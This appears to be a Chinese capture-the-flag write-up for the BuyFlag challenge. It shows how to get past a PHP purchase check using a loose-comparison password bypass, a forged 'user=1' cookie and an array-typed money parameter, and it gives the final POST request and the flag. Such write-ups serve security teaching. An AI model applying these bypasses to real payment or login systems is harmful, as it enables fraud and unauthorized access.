[极客大挑战 2019]BuyFlag 1

[极客大挑战 2019]BuyFlag 1

打开实例发现pay.php页面,有提示信息

image-20241106212039962

image-20241106213542967

打开源码发现password post提交逻辑

image-20241106212111245

burpsuite抓包传参,传入money和password参数,这里password是==弱比较,所以加个字符就可以绕过

password=404a&money=100000000

image-20241106213935246

回显发现并没有变化

注意到学生需要CUIT(Only Cuit’s students can buy the FLAG)

image-20241106213725808

尝试修改头信息,将cookie验证修改为1(0 false,1 ture)

image-20241106214054983

成功绕过身份验证(我这边bp不知道为啥一直提示password传不过去),所以我换了hacker bar提交;这边显示密码正确,身份验证也对了,但是money错误,怀疑是长度问题。(you have not enough money,loser~)

image-20241106215851550

采用数组绕过,成功获得flag

password=404a&money[]=100000000

image-20241106220316431

flag{46a2d632-843d-41bf-9a8a-42aac15baf18}

最终payload

POST /pay.php HTTP/1.1
Host: 8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 35
Origin: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81
Connection: keep-alive
Referer: http://8cb0e35d-dad9-4a41-86ca-b4cfdf800dd8.node5.buuoj.cn:81/pay.php
Cookie: user=1
Upgrade-Insecure-Requests: 1
Priority: u=0, i

password=404a&money[]=100000000
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

成为别人口中的IT高手

写文章不容易,充充电吧~

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值